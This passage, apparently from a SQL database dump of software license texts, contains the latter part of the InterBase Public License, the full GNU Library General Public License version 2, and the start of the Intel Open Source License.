3.5. Required Notices.\n\nYou must duplicate the notice in Exhibit A in each file of the Source Code.\nIf it is not possible to put such notice in a particular Source Code file\ndue to its structure, then You must include such notice in a location (such\nas a relevant directory) where a user would be likely to look for such a notice.\nIf You created one or more Modification(s) You may add your name as a Contributor\nto the notice described in Exhibit A. You must also duplicate this License\nin any documentation for the Source Code where You describe recipients\' rights\nor ownership rights relating to Covered Code. You may choose to offer, and\nto charge a fee for, warranty, support, indemnity or liability obligations\nto one or more recipients of Covered Code. However, You may do so only on\nYour own behalf, and not on behalf of the Initial Developer or any Contributor.\nYou must make it absolutely clear than any such warranty, support, indemnity\nor liability obligation is offered by You alone, and You hereby agree to indemnify\nthe Initial Developer and every Contributor for any liability incurred by\nthe Initial Developer or such Contributor as a result of warranty, support,\nindemnity or liability terms You offer.\n\n 3.6. Distribution of Executable Versions.\n\nYou may distribute Covered Code in Executable form only if the requirements\nof Section 3.1-3.5 have been met for that Covered Code, and if You include\na notice stating that the Source Code version of the Covered Code is available\nunder the terms of this License, including a description of how and where\nYou have fulfilled the obligations of Section 3.2. The notice must be conspicuously\nincluded in any notice in an Executable version, related documentation or\ncollateral in which You describe recipients\' rights relating to the Covered\nCode. You may distribute the Executable version of Covered Code or ownership\nrights under a license of Your choice, which may contain terms different from\nthis License, provided that You are in compliance with the terms of this License\nand that the license for the Executable version does not attempt to limit\nor alter the recipient\'s rights in the Source Code version from the rights\nset forth in this License. If You distribute the Executable version under\na different license You must make it absolutely clear that any terms which\ndiffer from this License are offered by You alone, not by the Initial Developer\nor any Contributor. You hereby agree to indemnify the Initial Developer and\nevery Contributor for any liability incurred by the Initial Developer or such\nContributor as a result of any such terms You offer.\n\n 3.7. Larger Works.\n\nYou may create a Larger Work by combining Covered Code with other code not\ngoverned by the terms of this License and distribute the Larger Work as a\nsingle product. In such a case, You must make sure the requirements of this\nLicense are fulfilled for the Covered Code.\n\n 4. Inability to Comply Due to Statute or Regulation.\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Code due to statute, judicial order,\nor regulation then You must: (a) comply with the terms of this License to\nthe maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be included in the LEGAL file described\nin Section 3.4 and must be included with all distributions of the Source Code.\nExcept to the extent prohibited by statute or regulation, such description\nmust be sufficiently detailed for a recipient of ordinary skill to be able\nto understand it.\n\n 5. Application of this License.\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A and to related Covered Code.\n\n 6. Versions of the License.\n\n 6.1. New Versions.\n\nBorland Software Corporation (\'\'Interbase\'\') may publish revised and/or new\nversions of the License from time to time. Each version will be given a distinguishing\nversion number.\n\n 6.2. Effect of New Versions.\n\nOnce Covered Code has been published under a particular version of the License,\nYou may always continue to use it under the terms of that version. You may\nalso choose to use such Covered Code under the terms of any subsequent version\nof the License published by Interbase. No one other than Interbase has the\nright to modify the terms applicable to Covered Code created under this License.\n\n 6.3. Derivative Works.\n\nIf You create or use a modified version of this License (which you may only\ndo in order to apply it to code which is not already Covered Code governed\nby this License), You must (a) rename Your license so that the phrases \'\'Mozilla\'\',\n\'\'MOZILLAPL\'\', \'\'MOZPL\'\', \'\'Netscape\'\', \"MPL\", \'\'NPL\", \"Interbase\", \"ISC\",\n\"IB\'\' or any confusingly similar phrase do not appear in your license (except\nto note that your license differs from this License) and (b) otherwise make\nit clear that Your version of the license contains terms which differ from\nthe Mozilla Public License and Netscape Public License. (Filling in the name\nof the Initial Developer, Original Code or Contributor in the notice described\nin Exhibit A shall not of themselves be deemed to be modifications of this\nLicense.)\n\n 6.4 Origin of the Interbase Public License.\n\nThe Interbase public license is based on the Mozilla Public License V 1.1\nwith the following changes:\n\nThe license is published by Borland Software Corporation. Only Borland Software\nCorporation can modify the terms applicable to Covered Code.\n\nThe license can be modified used for code which is not already governed by\nthis license. Modified versions of the license must be renamed to avoid confusion\nwith Netscape?s or Interbase Software?s license and must include a description\nof changes from the Interbase Public License.\n\n The name of the license in Exhibit A is the \"Interbase Public License\".\n\n The reference to an alternative license in Exhibit A has been removed.\n\n Amendments I, II, III, V, and VI have been deleted.\n\n Exhibit A, Netscape Public License has been deleted\n\nA new amendment (II) has been added, describing the required and restricted\nrights to use the trademarks of Borland Software Corporation\n\n 7. DISCLAIMER OF WARRANTY.\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\'\' BASIS, WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES THAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR\nA PARTICULAR PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY\nAND PERFORMANCE OF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE\nDEFECTIVE IN ANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR)\nASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8. TERMINATION.\n\n8.1. This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n8.2. If You initiate litigation by asserting a patent infringement claim (excluding\ndeclatory judgment actions) against Initial Developer or a Contributor (the\nInitial Developer or Contributor against whom You file such action is referred\nto as \"Participant\") alleging that:\n\n(a) such Participant\'s Contributor Version directly or indirectly infringes\nany patent, then any and all rights granted by such Participant to You under\nSections 2.1 and/or 2.2 of this License shall, upon 60 days notice from Participant\nterminate prospectively, unless if within 60 days after receipt of notice\nYou either: (i) agree in writing to pay Participant a mutually agreeable reasonable\nroyalty for Your past and future use of Modifications made by such Participant,\nor (ii) withdraw Your litigation claim with respect to the Contributor Version\nagainst such Participant. If within 60 days of notice, a reasonable royalty\nand payment arrangement are not mutually agreed upon in writing by the parties\nor the litigation claim is not withdrawn, the rights granted by Participant\nto You under Sections 2.1 and/or 2.2 automatically terminate at the expiration\nof the 60 day notice period specified above.\n\n(b) any software, hardware, or device, other than such Participant\'s Contributor\nVersion, directly or indirectly infringes any patent, then any rights granted\nto You by such Participant under Sections 2.1(b) and 2.2(b) are revoked effective\nas of the date You first made, used, sold, distributed, or had made, Modifications\nmade by that Participant.\n\n8.3. If You assert a patent infringement claim against Participant alleging\nthat such Participant\'s Contributor Version directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by such Participant under Sections 2.1 or 2.2\nshall be taken into account in determining the amount or value of any payment\nor license.\n\n8.4. In the event of termination under Sections 8.1 or 8.2 above, all end\nuser license agreements (excluding distributors and resellers) which have\nbeen validly granted by You or any distributor hereunder prior to termination\nshall survive termination.\n\n 9. LIMITATION OF LIABILITY.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL YOU, THE INITIAL DEVELOPER, ANY\nOTHER CONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE, OR ANY SUPPLIER OF\nANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL,\nOR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES\nFOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY\nAND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL HAVE\nBEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY\nSHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH\nPARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 10. U.S. GOVERNMENT END USERS.\n\nThe Covered Code is a \'\'commercial item,\'\' as that term is defined in 48 C.F.R.\n2.101 (Oct. 1995), consisting of \'\'commercial computer software\'\' and \'\'commercial\ncomputer software documentation,\'\' as such terms are used in 48 C.F.R. 12.212\n(Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through\n227.7202-4 (June 1995), all U.S. Government End Users acquire Covered Code\nwith only those rights set forth herein.\n\n 11. MISCELLANEOUS.\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by California law provisions (except to the extent\napplicable law, if any, provides otherwise), excluding its conflict-of-law\nprovisions. With respect to disputes in which at least one party is a citizen\nof, or an entity chartered or registered to do business in the United States\nof America, any litigation relating to this License shall be subject to the\njurisdiction of the Federal Courts of the Northern District of California,\nwith venue lying in Santa Clara County, California, with the losing party\nresponsible for costs, including without limitation, court costs and reasonable\nattorneys\' fees and expenses. The application of the United Nations Convention\non Contracts for the International Sale of Goods is expressly excluded. Any\nlaw or regulation which provides that the language of a contract shall be\nconstrued against the drafter shall not apply to this License.\n\n 12. RESPONSIBILITY FOR CLAIMS.\n\nAs between Initial Developer and the Contributors, each party is responsible\nfor claims and damages arising, directly or indirectly, out of its utilization\nof rights under this License and You agree to work with Initial Developer\nand Contributors to distribute such responsibility on an equitable basis.\nNothing herein is intended or shall be deemed to constitute any admission\nof liability.\n\n 13. MULTIPLE-LICENSED CODE.\n\nInitial Developer may designate portions of the Covered Code as \"Multiple-Licensed\".\n\"Multiple-Licensed\" means that the Initial Developer permits you to utilize\nportions of the Covered Code under Your choice of the NPL or the alternative\nlicenses, if any, specified by the Initial Developer in the file described\nin Exhibit A.\n\n EXHIBIT A - InterBase Public License.\n\n\" The contents of this file are subject to the Interbase Public License Version\n1.0 (the \"License\"); you may not use this file except in compliance with the\nLicense. You may obtain a copy of the License at http://www.Interbase.com/IPL.html\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\n The Original Code was created by InterBase Software Corp and its successors.\n\nPortions created by Borland/Inprise are Copyright (C) Borland/Inprise. All\nRights Reserved.\n\n Contributor(s): ______________________________________ .\n\nAMENDMENTS\n\nI. InterBase and logo. This License does not grant any rights to use the trademarks\n\"Interbase\'\', \"Java\" or \"JavaScript\" even if such marks are included in the\nOriginal Code or Modifications.\n\n II. Trademark Usage.\n\nII.1. Advertising Materials. All advertising materials mentioning features\nor use of the covered Code must display the following acknowledgement: \"This\nproduct includes software developed by Borland Software Corp. \"\n\nII.2. Endorsements. The names \"InterBase,\" \"ISC,\" and \"IB\" must not be used\nto endorse or promote Contributor Versions or Larger Works without the prior\nwritten permission of Interbase.\n\nII.3. Product Names. Contributor Versions and Larger Works may not be called\n\"InterBase\" or \"Interbase\" nor may the word \"InterBase\" appear in their names\nwithout the prior written permission of Interbase.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(195,'LGPL-2.0-only','GNU LIBRARY GENERAL PUBLIC LICENSE\n\nVersion 2, June 1991\n\nCopyright (C) 1991 Free Software Foundation, Inc.\n\n51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\n[This is the first released version of the library GPL. It is numbered 2 because\nit goes with version 2 of the ordinary GPL.]\n\nPreamble\n\nThe licenses for most software are designed to take away your freedom to share\nand change it. By contrast, the GNU General Public Licenses are intended to\nguarantee your freedom to share and change free software--to make sure the\nsoftware is free for all its users.\n\nThis license, the Library General Public License, applies to some specially\ndesignated Free Software Foundation software, and to any other libraries whose\nauthors decide to use it. You can use it for your libraries, too.\n\nWhen we speak of free software, we are referring to freedom, not price. Our\nGeneral Public Licenses are designed to make sure that you have the freedom\nto distribute copies of free software (and charge for this service if you\nwish), that you receive source code or can get it if you want it, that you\ncan change the software or use pieces of it in new free programs; and that\nyou know you can do these things.\n\nTo protect your rights, we need to make restrictions that forbid anyone to\ndeny you these rights or to ask you to surrender the rights. These restrictions\ntranslate to certain responsibilities for you if you distribute copies of\nthe library, or if you modify it.\n\nFor example, if you distribute copies of the library, whether gratis or for\na fee, you must give the recipients all the rights that we gave you. You must\nmake sure that they, too, receive or can get the source code. If you link\na program with the library, you must provide complete object files to the\nrecipients so that they can relink them with the library, after making changes\nto the library and recompiling it. And you must show them these terms so they\nknow their rights.\n\nOur method of protecting your rights has two steps: (1) copyright the library,\nand (2) offer you this license which gives you legal permission to copy, distribute\nand/or modify the library.\n\nAlso, for each distributor\'s protection, we want to make certain that everyone\nunderstands that there is no warranty for this free library. If the library\nis modified by someone else and passed on, we want its recipients to know\nthat what they have is not the original version, so that any problems introduced\nby others will not reflect on the original authors\' reputations.\n\nFinally, any free program is threatened constantly by software patents. We\nwish to avoid the danger that companies distributing free software will individually\nobtain patent licenses, thus in effect transforming the program into proprietary\nsoftware. To prevent this, we have made it clear that any patent must be licensed\nfor everyone\'s free use or not licensed at all.\n\nMost GNU software, including some libraries, is covered by the ordinary GNU\nGeneral Public License, which was designed for utility programs. This license,\nthe GNU Library General Public License, applies to certain designated libraries.\nThis license is quite different from the ordinary one; be sure to read it\nin full, and don\'t assume that anything in it is the same as in the ordinary\nlicense.\n\nThe reason we have a separate public license for some libraries is that they\nblur the distinction we usually make between modifying or adding to a program\nand simply using it. Linking a program with a library, without changing the\nlibrary, is in some sense simply using the library, and is analogous to running\na utility program or application program. However, in a textual and legal\nsense, the linked executable is a combined work, a derivative of the original\nlibrary, and the ordinary General Public License treats it as such.\n\nBecause of this blurred distinction, using the ordinary General Public License\nfor libraries did not effectively promote software sharing, because most developers\ndid not use the libraries. We concluded that weaker conditions might promote\nsharing better.\n\nHowever, unrestricted linking of non-free programs would deprive the users\nof those programs of all benefit from the free status of the libraries themselves.\nThis Library General Public License is intended to permit developers of non-free\nprograms to use free libraries, while preserving your freedom as a user of\nsuch programs to change the free libraries that are incorporated in them.\n(We have not seen how to achieve this as regards changes in header files,\nbut we have achieved it as regards changes in the actual functions of the\nLibrary.) The hope is that this will lead to faster development of free libraries.\n\nThe precise terms and conditions for copying, distribution and modification\nfollow. Pay close attention to the difference between a \"work based on the\nlibrary\" and a \"work that uses the library\". The former contains code derived\nfrom the library, while the latter only works together with the library.\n\nNote that it is possible for a library to be covered by the ordinary General\nPublic License rather than by this special one.\n\nTERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n0. This License Agreement applies to any software library which contains a\nnotice placed by the copyright holder or other authorized party saying it\nmay be distributed under the terms of this Library General Public License\n(also called \"this License\"). Each licensee is addressed as \"you\".\n\nA \"library\" means a collection of software functions and/or data prepared\nso as to be conveniently linked with application programs (which use some\nof those functions and data) to form executables.\n\nThe \"Library\", below, refers to any such software library or work which has\nbeen distributed under these terms. A \"work based on the Library\" means either\nthe Library or any derivative work under copyright law: that is to say, a\nwork containing the Library or a portion of it, either verbatim or with modifications\nand/or translated straightforwardly into another language. (Hereinafter, translation\nis included without limitation in the term \"modification\".)\n\n\"Source code\" for a work means the preferred form of the work for making modifications\nto it. For a library, complete source code means all the source code for all\nmodules it contains, plus any associated interface definition files, plus\nthe scripts used to control compilation and installation of the library.\n\nActivities other than copying, distribution and modification are not covered\nby this License; they are outside its scope. The act of running a program\nusing the Library is not restricted, and output from such a program is covered\nonly if its contents constitute a work based on the Library (independent of\nthe use of the Library in a tool for writing it). Whether that is true depends\non what the Library does and what the program that uses the Library does.\n\n1. You may copy and distribute verbatim copies of the Library\'s complete source\ncode as you receive it, in any medium, provided that you conspicuously and\nappropriately publish on each copy an appropriate copyright notice and disclaimer\nof warranty; keep intact all the notices that refer to this License and to\nthe absence of any warranty; and distribute a copy of this License along with\nthe Library.\n\nYou may charge a fee for the physical act of transferring a copy, and you\nmay at your option offer warranty protection in exchange for a fee.\n\n2. You may modify your copy or copies of the Library or any portion of it,\nthus forming a work based on the Library, and copy and distribute such modifications\nor work under the terms of Section 1 above, provided that you also meet all\nof these conditions:\n\n a) The modified work must itself be a software library.\n\nb) You must cause the files modified to carry prominent notices stating that\nyou changed the files and the date of any change.\n\nc) You must cause the whole of the work to be licensed at no charge to all\nthird parties under the terms of this License.\n\nd) If a facility in the modified Library refers to a function or a table of\ndata to be supplied by an application program that uses the facility, other\nthan as an argument passed when the facility is invoked, then you must make\na good faith effort to ensure that, in the event an application does not supply\nsuch function or table, the facility still operates, and performs whatever\npart of its purpose remains meaningful.\n\n(For example, a function in a library to compute square roots has a purpose\nthat is entirely well-defined independent of the application. Therefore, Subsection\n2d requires that any application-supplied function or table used by this function\nmust be optional: if the application does not supply it, the square root function\nmust still compute square roots.)\n\nThese requirements apply to the modified work as a whole. If identifiable\nsections of that work are not derived from the Library, and can be reasonably\nconsidered independent and separate works in themselves, then this License,\nand its terms, do not apply to those sections when you distribute them as\nseparate works. But when you distribute the same sections as part of a whole\nwhich is a work based on the Library, the distribution of the whole must be\non the terms of this License, whose permissions for other licensees extend\nto the entire whole, and thus to each and every part regardless of who wrote\nit.\n\nThus, it is not the intent of this section to claim rights or contest your\nrights to work written entirely by you; rather, the intent is to exercise\nthe right to control the distribution of derivative or collective works based\non the Library.\n\nIn addition, mere aggregation of another work not based on the Library with\nthe Library (or with a work based on the Library) on a volume of a storage\nor distribution medium does not bring the other work under the scope of this\nLicense.\n\n3. You may opt to apply the terms of the ordinary GNU General Public License\ninstead of this License to a given copy of the Library. To do this, you must\nalter all the notices that refer to this License, so that they refer to the\nordinary GNU General Public License, version 2, instead of to this License.\n(If a newer version than version 2 of the ordinary GNU General Public License\nhas appeared, then you can specify that version instead if you wish.) Do not\nmake any other change in these notices.\n\nOnce this change is made in a given copy, it is irreversible for that copy,\nso the ordinary GNU General Public License applies to all subsequent copies\nand derivative works made from that copy.\n\nThis option is useful when you wish to copy part of the code of the Library\ninto a program that is not a library.\n\n4. You may copy and distribute the Library (or a portion or derivative of\nit, under Section 2) in object code or executable form under the terms of\nSections 1 and 2 above provided that you accompany it with the complete corresponding\nmachine-readable source code, which must be distributed under the terms of\nSections 1 and 2 above on a medium customarily used for software interchange.\n\nIf distribution of object code is made by offering access to copy from a designated\nplace, then offering equivalent access to copy the source code from the same\nplace satisfies the requirement to distribute the source code, even though\nthird parties are not compelled to copy the source along with the object code.\n\n5. A program that contains no derivative of any portion of the Library, but\nis designed to work with the Library by being compiled or linked with it,\nis called a \"work that uses the Library\". Such a work, in isolation, is not\na derivative work of the Library, and therefore falls outside the scope of\nthis License.\n\nHowever, linking a \"work that uses the Library\" with the Library creates an\nexecutable that is a derivative of the Library (because it contains portions\nof the Library), rather than a \"work that uses the library\". The executable\nis therefore covered by this License. Section 6 states terms for distribution\nof such executables.\n\nWhen a \"work that uses the Library\" uses material from a header file that\nis part of the Library, the object code for the work may be a derivative work\nof the Library even though the source code is not. Whether this is true is\nespecially significant if the work can be linked without the Library, or if\nthe work is itself a library. The threshold for this to be true is not precisely\ndefined by law.\n\nIf such an object file uses only numerical parameters, data structure layouts\nand accessors, and small macros and small inline functions (ten lines or less\nin length), then the use of the object file is unrestricted, regardless of\nwhether it is legally a derivative work. (Executables containing this object\ncode plus portions of the Library will still fall under Section 6.)\n\nOtherwise, if the work is a derivative of the Library, you may distribute\nthe object code for the work under the terms of Section 6. Any executables\ncontaining that work also fall under Section 6, whether or not they are linked\ndirectly with the Library itself.\n\n6. As an exception to the Sections above, you may also compile or link a \"work\nthat uses the Library\" with the Library to produce a work containing portions\nof the Library, and distribute that work under terms of your choice, provided\nthat the terms permit modification of the work for the customer\'s own use\nand reverse engineering for debugging such modifications.\n\nYou must give prominent notice with each copy of the work that the Library\nis used in it and that the Library and its use are covered by this License.\nYou must supply a copy of this License. If the work during execution displays\ncopyright notices, you must include the copyright notice for the Library among\nthem, as well as a reference directing the user to the copy of this License.\nAlso, you must do one of these things:\n\na) Accompany the work with the complete corresponding machine-readable source\ncode for the Library including whatever changes were used in the work (which\nmust be distributed under Sections 1 and 2 above); and, if the work is an\nexecutable linked with the Library, with the complete machine-readable \"work\nthat uses the Library\", as object code and/or source code, so that the user\ncan modify the Library and then relink to produce a modified executable containing\nthe modified Library. (It is understood that the user who changes the contents\nof definitions files in the Library will not necessarily be able to recompile\nthe application to use the modified definitions.)\n\nb) Accompany the work with a written offer, valid for at least three years,\nto give the same user the materials specified in Subsection 6a, above, for\na charge no more than the cost of performing this distribution.\n\nc) If distribution of the work is made by offering access to copy from a designated\nplace, offer equivalent access to copy the above specified materials from\nthe same place.\n\nd) Verify that the user has already received a copy of these materials or\nthat you have already sent this user a copy.\n\nFor an executable, the required form of the \"work that uses the Library\" must\ninclude any data and utility programs needed for reproducing the executable\nfrom it. However, as a special exception, the source code distributed need\nnot include anything that is normally distributed (in either source or binary\nform) with the major components (compiler, kernel, and so on) of the operating\nsystem on which the executable runs, unless that component itself accompanies\nthe executable.\n\nIt may happen that this requirement contradicts the license restrictions of\nother proprietary libraries that do not normally accompany the operating system.\nSuch a contradiction means you cannot use both them and the Library together\nin an executable that you distribute.\n\n7. You may place library facilities that are a work based on the Library side-by-side\nin a single library together with other library facilities not covered by\nthis License, and distribute such a combined library, provided that the separate\ndistribution of the work based on the Library and of the other library facilities\nis otherwise permitted, and provided that you do these two things:\n\na) Accompany the combined library with a copy of the same work based on the\nLibrary, uncombined with any other library facilities. This must be distributed\nunder the terms of the Sections above.\n\nb) Give prominent notice with the combined library of the fact that part of\nit is a work based on the Library, and explaining where to find the accompanying\nuncombined form of the same work.\n\n8. You may not copy, modify, sublicense, link with, or distribute the Library\nexcept as expressly provided under this License. Any attempt otherwise to\ncopy, modify, sublicense, link with, or distribute the Library is void, and\nwill automatically terminate your rights under this License. However, parties\nwho have received copies, or rights, from you under this License will not\nhave their licenses terminated so long as such parties remain in full compliance.\n\n9. You are not required to accept this License, since you have not signed\nit. However, nothing else grants you permission to modify or distribute the\nLibrary or its derivative works. These actions are prohibited by law if you\ndo not accept this License. Therefore, by modifying or distributing the Library\n(or any work based on the Library), you indicate your acceptance of this License\nto do so, and all its terms and conditions for copying, distributing or modifying\nthe Library or works based on it.\n\n10. Each time you redistribute the Library (or any work based on the Library),\nthe recipient automatically receives a license from the original licensor\nto copy, distribute, link with or modify the Library subject to these terms\nand conditions. You may not impose any further restrictions on the recipients\'\nexercise of the rights granted herein. You are not responsible for enforcing\ncompliance by third parties to this License.\n\n11. If, as a consequence of a court judgment or allegation of patent infringement\nor for any other reason (not limited to patent issues), conditions are imposed\non you (whether by court order, agreement or otherwise) that contradict the\nconditions of this License, they do not excuse you from the conditions of\nthis License. If you cannot distribute so as to satisfy simultaneously your\nobligations under this License and any other pertinent obligations, then as\na consequence you may not distribute the Library at all. For example, if a\npatent license would not permit royalty-free redistribution of the Library\nby all those who receive copies directly or indirectly through you, then the\nonly way you could satisfy both it and this License would be to refrain entirely\nfrom distribution of the Library.\n\nIf any portion of this section is held invalid or unenforceable under any\nparticular circumstance, the balance of the section is intended to apply,\nand the section as a whole is intended to apply in other circumstances.\n\nIt is not the purpose of this section to induce you to infringe any patents\nor other property right claims or to contest validity of any such claims;\nthis section has the sole purpose of protecting the integrity of the free\nsoftware distribution system which is implemented by public license practices.\nMany people have made generous contributions to the wide range of software\ndistributed through that system in reliance on consistent application of that\nsystem; it is up to the author/donor to decide if he or she is willing to\ndistribute software through any other system and a licensee cannot impose\nthat choice.\n\nThis section is intended to make thoroughly clear what is believed to be a\nconsequence of the rest of this License.\n\n12. If the distribution and/or use of the Library is restricted in certain\ncountries either by patents or by copyrighted interfaces, the original copyright\nholder who places the Library under this License may add an explicit geographical\ndistribution limitation excluding those countries, so that distribution is\npermitted only in or among countries not thus excluded. In such case, this\nLicense incorporates the limitation as if written in the body of this License.\n\n13. The Free Software Foundation may publish revised and/or new versions of\nthe Library General Public License from time to time. Such new versions will\nbe similar in spirit to the present version, but may differ in detail to address\nnew problems or concerns.\n\nEach version is given a distinguishing version number. If the Library specifies\na version number of this License which applies to it and \"any later version\",\nyou have the option of following the terms and conditions either of that version\nor of any later version published by the Free Software Foundation. If the\nLibrary does not specify a license version number, you may choose any version\never published by the Free Software Foundation.\n\n14. If you wish to incorporate parts of the Library into other free programs\nwhose distribution conditions are incompatible with these, write to the author\nto ask for permission. For software which is copyrighted by the Free Software\nFoundation, write to the Free Software Foundation; we sometimes make exceptions\nfor this. Our decision will be guided by the two goals of preserving the free\nstatus of all derivatives of our free software and of promoting the sharing\nand reuse of software generally.\n\n NO WARRANTY\n\n15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR\nTHE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE\nSTATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE LIBRARY\n\"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME\nTHE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE\nTHE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY\nGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE\nOR INABILITY TO USE THE LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA\nOR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES\nOR A FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH\nHOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\nEND OF TERMS AND CONDITIONS\n\nHow to Apply These Terms to Your New Libraries\n\nIf you develop a new library, and you want it to be of the greatest possible\nuse to the public, we recommend making it free software that everyone can\nredistribute and change. You can do so by permitting redistribution under\nthese terms (or, alternatively, under the terms of the ordinary General Public\nLicense).\n\nTo apply these terms, attach the following notices to the library. It is safest\nto attach them to the start of each source file to most effectively convey\nthe exclusion of warranty; and each file should have at least the \"copyright\"\nline and a pointer to where the full notice is found.\n\none line to give the library\'s name and an idea of what it does.\n\nCopyright (C) year name of author\n\nThis library is free software; you can redistribute it and/or modify it under\nthe terms of the GNU Library General Public License as published by the Free\nSoftware Foundation; either version 2 of the License, or (at your option)\nany later version.\n\nThis library is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more\ndetails.\n\nYou should have received a copy of the GNU Library General Public License\nalong with this library; if not, write to the Free Software Foundation, Inc.,\n51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA.\n\nAlso add information on how to contact you by electronic and paper mail.\n\nYou should also get your employer (if you work as a programmer) or your school,\nif any, to sign a \"copyright disclaimer\" for the library, if necessary. Here\nis a sample; alter the names:\n\nYoyodyne, Inc., hereby disclaims all copyright interest in\n\nthe library `Frob\' (a library for tweaking knobs) written\n\nby James Random Hacker.\n\nsignature of Ty Coon, 1 April 1990\n\nTy Coon, President of Vice\n\nThat\'s all there is to it!\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(196,'Intel','Intel Open Source License\n\nCopyright (c) 1996-2000 Intel Corporation\n\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n• Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n• Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n• Neither the name of the Intel Corporation nor the names of its contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE INTEL OR CONTRIBUTORS BE LIABLE FOR\nANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\nLOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\nON ANY THEORY OF 